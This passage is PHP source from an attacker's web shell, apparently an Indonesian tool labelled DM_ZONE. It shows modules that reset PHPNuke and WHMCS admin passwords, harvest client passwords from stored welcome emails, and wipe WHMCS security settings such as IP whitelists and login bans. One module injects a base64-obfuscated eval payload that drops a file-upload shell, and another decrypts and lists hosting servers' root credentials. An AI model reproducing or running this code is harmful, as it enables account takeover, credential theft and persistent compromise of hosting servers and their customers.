- <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
- DB NAME<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
- DB USER<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
- DB PASSWORD<br/>
- <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
- <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
- <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
- NEW ADMIN LOGIN USER<br/>
- <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
- NEW ADMIN LOGIN PASS<br/>
- <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
- <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu3,$anu4);
- @mysql_select_db($anu2);
- $idmaho=str_replace("\'","'",$idmaho);
- $target_id = $_POST['idmaho'];
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
- $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
- $oke=@mysql_query($sodok1);
- $oke=@mysql_query($sodok2);
- if($oke)
- {
- echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- // x=nuke
- elseif(isset($_GET['x']) && ($_GET['x'] == 'nuke')) {
- // password changer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=nuke" method="post">
- <?php
- echo "<html><head><title>PHPNukeLoginChanger</title></head>";
- echo "<body><center>
- <h2>^_^ DM_ZONE ^_^</h2>
- <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
- <form method=POST action=''>
- DB HOST<br/>
- <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
- DB NAME<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
- DB USER<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
- DB PASSWORD<br/>
- <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
- <hr style='color:lime;'>
- TARGET PREFIX<br/>
- <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
- NEW ADMIN LOGIN USER<br/>
- <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
- NEW ADMIN LOGIN PASS<br/>
- <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
- <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu3,$anu4);
- @mysql_select_db($anu2);
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $prefix = $_POST['prefix'];
- $table_name1 = $prefix."users" ;
- $table_name2 = $prefix."authors" ;
- $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
- $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
- $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
- $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
- $oke=@mysql_query($okenuke1);
- $oke=@mysql_query($okenuke2);
- $oke=@mysql_query($okenuke3);
- $oke=@mysql_query($okenuke4);
- if($oke)
- {
- echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- # x=dmwhmcs9
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs9')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs9" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
- <br></form></center>
- <?php
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- if(isset($_POST['plapon'])){
- $target = $_POST['url'];
- $bukadikitjoss = fopen("$target/?licensedebug","r");
- $hasil = '';
- while (!feof($bukadikitjoss)) {
- $hasil .= fread($bukadikitjoss, 8192);
- }
- echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
- }
- echo "</table>";
- }
- # x=dmwhmcs1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs1')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs1" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br></form></center>
- <?php
- if(isset($_POST['plapon'])) {
- $perawan = $_POST['anu1'];
- $kimcil = $_POST['anu2'];
- $janda = $_POST['anu3'];
- $hotel = $_POST['anu4'];
- function get_string_between($string, $start, $end){
- $string = " ".$string;
- $ini = strpos($string,$start);
- if ($ini == 0) return "";
- $ini += strlen($start);
- $len = strpos($string,$end,$ini) - $ini;
- return substr($string,$ini,$len);
- }
- @mysql_connect($perawan,$kimcil,$janda);
- @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
- $query="select subject,message from tblemails";
- $result=mysql_query($query);
- mysql_close();
- $num=mysql_numrows($result);
- $i=0;
- while ($i < $num) {
- $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
- <th align='center'><b>CLIENT EMAIL</b></th>
- <th align='center'><b>CLIENT PASSWORD</b></th>
- </tr>";
- if(stristr($css,"Welcome")){
- $s =mysql_result($result,$i,"message");
- if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
- $mail= get_string_between($s,"Login Username: ","<br />");
- $m2 = get_string_between($s,"Email Address: ","<br />");
- $pass = get_string_between($s,"Password: ","</p>");
- print $mail.$m2.":".$pass."<br>";
- echo "<tr>
- <td align='center'>$mail.$m2.</td>
- <td align='center'>".$pass."</td>
- </tr>";
- }
- }
- ++$i;
- }
- }
- echo "</table>";
- }
- # x=dmwhmcs3
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs3')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs3" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
- <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
- <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="hacker" name="userbaru"></td></tr>
- <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="hackerpassword" name="passbaru"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </form>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $idmaho=str_replace("\'","'",$idmaho);
- $target_id = $_POST['idmaho'];
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
- $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
- $udah_ganteng=@mysql_query($colox);
- $udah_ganteng=@mysql_query($coloxx);
- if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }
- # x=dmwhmcs2
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs2')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs2" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
- name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
- </td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </form>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $shell=str_replace("'","'",$shell);
- $gosok_shell = $_POST['shell'];
- $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
- $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }
- # x=dmwhmcs4
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs4')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs4" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </FORM>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
- $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
- $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
- $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
- $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
- $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
- $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
- $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
- $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
- $udah_ganteng=@mysql_query($crot1);
- $udah_ganteng=@mysql_query($crot2);
- $udah_ganteng=@mysql_query($crot3);
- $udah_ganteng=@mysql_query($crot4);
- $udah_ganteng=@mysql_query($crot5);
- $udah_ganteng=@mysql_query($crot6);
- $udah_ganteng=@mysql_query($crot7);
- $udah_ganteng=@mysql_query($crot8);
- $udah_ganteng=@mysql_query($crot9);
- $udah_ganteng=@mysql_query($crot10);
- if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }
- # x=whmcs1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs1')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=whmcs1" method="post">
- <p><br/><body>
- <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ WHMCS</span> <span class="b8">DECODER ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style="color:#FF0000;background-color:#000000" type="text" size="60" name="anu5"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br></form></center>
- <?php
- $perawan = $_POST['anu1'];
- $kimcil = $_POST['anu2'];
- $janda = $_POST['anu3'];
- $hotel = $_POST['anu4'];
- $kondom = $_POST['anu5'];
- @mysql_connect($perawan,$kimcil,$janda);
- @mysql_select_db($hotel);
- $cc_encryption_hash = $kondom;
- function dec($string,$cc_encryption_hash){
- $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
- $hash_key = _hash($key);
- $hash_length = strlen($hash_key);
- $string = base64_decode($string);
- $tmp_iv = substr($string,0,$hash_length);
- $string = substr($string,$hash_length,strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length){
- $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen($string)){
- if (($c != 0 AND $c % $hash_length == 0)){
- $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
- }
- $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash($string)
- {
- $hash = (function_exists('sha1')) ? sha1($string):md5($string);
- $out = '';
- $c = 0;
- while ($c < strlen($hash)){
- $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- ######## GO TO HELL ########
- ##### :D ########### :D #####
- if(isset($_POST['plapon'])) {
- $query = mysql_query("SELECT *FROM tblservers");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b>TYPE</b></th>
- <th align='center'><b>ACTIVE</b></th>
- <th align='center'><b>HOSTNAME</b></th>
- <th align='center'><b>IP ADDRESS</b></th>
- <th align='center'><b>USERNAME</b></th>
- <th align='center'><b>PASSWORD</b></th>
- <th align='center'><b>ACCESS HASH</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)) {
- echo "<tr>
- <td align='center'>{$v['type']}</td>
- <td align='center'>{$v['active']}</td>
- <td align='center'>{$v['hostname']}</td>
- <td align='center'>{$v['ipaddress']}</td>
- <td align='center'>{$v['username']}</td>
- <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'>{$v['accesshash']}</td>
- </tr>";
- }
- echo "</table>";
